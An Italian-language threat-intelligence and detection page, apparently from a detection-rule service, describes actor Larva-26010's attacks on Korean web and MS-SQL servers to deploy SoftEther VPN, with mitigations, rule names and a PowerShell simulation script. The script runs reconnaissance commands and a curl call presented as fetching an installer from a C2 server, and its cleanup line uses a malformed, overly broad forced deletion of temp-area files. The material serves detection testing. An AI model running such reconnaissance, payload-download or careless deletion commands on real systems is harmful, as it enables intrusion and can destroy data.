Campagna Malware Mira ai Server Web Coreani Che Eseguono SoftEther VPN
Detection stack
- AIDR
- Alert
- ETL
- Query
Sintesi
L’attore di minacce Larva-26010 sta prendendo di mira server web e MS-SQL in Corea del Sud per distribuire SoftEther VPN. I sistemi compromessi vengono riutilizzati come server VPN, potenzialmente utilizzando connessioni a cascata per nascondere la vera infrastruttura C&C degli attaccanti. L’intrusione inizia tipicamente con la compromissione del server web, seguita dal dispiegamento di web shell e SQLShells.
Indagine
AhnLab Security Intelligence Center ha identificato attività di attacco recenti tra aprile e agosto 2026. L’indagine ha rivelato un cambiamento nella sequenza di attacco, con i server web compromessi per primi, seguiti da comandi di scoperta, installazione di SoftEther VPN e successivi attacchi contro i server MS-SQL per distribuire CLR SqlShell. Gli attaccanti hanno anche utilizzato strumenti come PowerShell, bitsadmin, e certutil per la consegna del payload.
Mitigazione
Gli amministratori dovrebbero ispezionare i server web per vulnerabilità sfruttabili e convalidare tutti i valori di input utilizzati nelle query DBMS e nelle richieste del servizio web. I permessi di esecuzione dovrebbero essere ristretti nelle directory di upload, mentre i server web IIS e i sistemi operativi dovrebbero rimanere completamente aggiornati. Antivirus e prodotti di sicurezza come V3 dovrebbero essere anche aggiornati all’ultima versione disponibile.
Risposta
Se viene rilevata attività malevola, i server web e MS-SQL compromessi dovrebbero essere isolati immediatamente per limitare il movimento laterale. Gli investigatori dovrebbero determinare l’entità del dispiegamento di web shell e SqlShell e rivedere i nuovi account utente creati per identificare eventuali account amministratore non autorizzati. Anche le impostazioni di registro come UseLogonCredential dovrebbero essere esaminate per modifiche sospette.
Flusso di Attacco
Rilevamenti
Utilizzo di Certutil per codifica dati e operazioni su certificati (via cmdline)
Download o upload tramite Powershell (via cmdline)
Possibile enumerazione del sistema (via cmdline)
Possibile scoperta della configurazione della rete del sistema (via cmdline)
Possibile esecuzione tramite uso di nome di script abbreviato (via cmdline)
Uso sospetto di CURL (via cmdline)
Download di file sospetti con IP diretto (via proxy)
IoC (HashMd5) per rilevare: Casi di attacchi malware su server Web domestici che eseguono SoftEther VPN in Corea
IoC (SourceIP) per rilevare: Casi di attacchi malware su server Web domestici che eseguono SoftEther VPN in Corea
IoC (DestinationIP) per rilevare: Casi di attacchi malware su server Web domestici che eseguono SoftEther VPN in Corea
Rilevato possibile attacco DoS su AWS CloudFront [AWS Cloudtrail]
Downloader PowerShell ed escalation di privilegi tramite creazione di account utente [PowerShell di Windows]
Scoperta Microsoft Windows e installazione di SoftEther VPN [Server Web]
## Esecuzione di Simulazione
Prerequisito: Il controllo pre-volo di Telemetria e Baseline deve essere superato.
Motivo: Questa sezione descrive l’esecuzione precisa della tecnica (TTP) dell’avversario progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa di Attacco e Comandi: L’avversario ha ottenuto l’accesso iniziale attraverso una vulnerabilità web. Per facilitare il movimento laterale e stabilire una backdoor persistente, devono mappare la rete locale e scaricare l’installatore di SoftEther VPN. L’attaccante esegue
ipconfig /allper mappare l’interfaccia,whoamiper confermare i privilegi, e usacurlper recuperare l’installatore da un server di comando e controllo (C2) remoto. Questa sequenza specifica è progettata per attivare la logica di rilevamento “Installazione di SoftEther VPN” corrispondendo esattamente alle stringhe di comando definite nella regola Sigma. -
Script di Test di Regressione:
# Script di Simulazione: Scoperta di SoftEther e Download di Payload # Questo script esegue esattamente i comandi che la regola sta cercando. Write-Host "[+] Avvio della Fase di Scoperta..." -ForegroundColor Cyan # Comando di trigger selection_command_lines: 'whoami' whoami # Comando di trigger selection_command_lines: 'ipconfig /all' ipconfig /all # Comando di trigger selection_command_lines: 'netstat -ano -p tcp' netstat -ano -p tcp # Comando di trigger selection_command_lines: 'systeminfo' systeminfo Write-Host "[+] Avvio della Fase di Download del Payload..." -ForegroundColor Cyan # Trigger selection_images: 'curl.exe' E selection_command_lines: 'curl -h' # Nota: Usciamo -h per rimanere nella logica della regola simulando un intento di download curl -h https://example.com/softether_installer.exe Write-Host "[+] Simulazione Completa." -ForegroundColor Green -
Comandi di Pulizia:
# Non sono stati effettivamente scaricati file in questa simulazione, # ma ci assicuriamo che non rimangano artefatti. Remove-Item -Path "$env:TEMP*" -Force -ErrorAction SilentlyContinue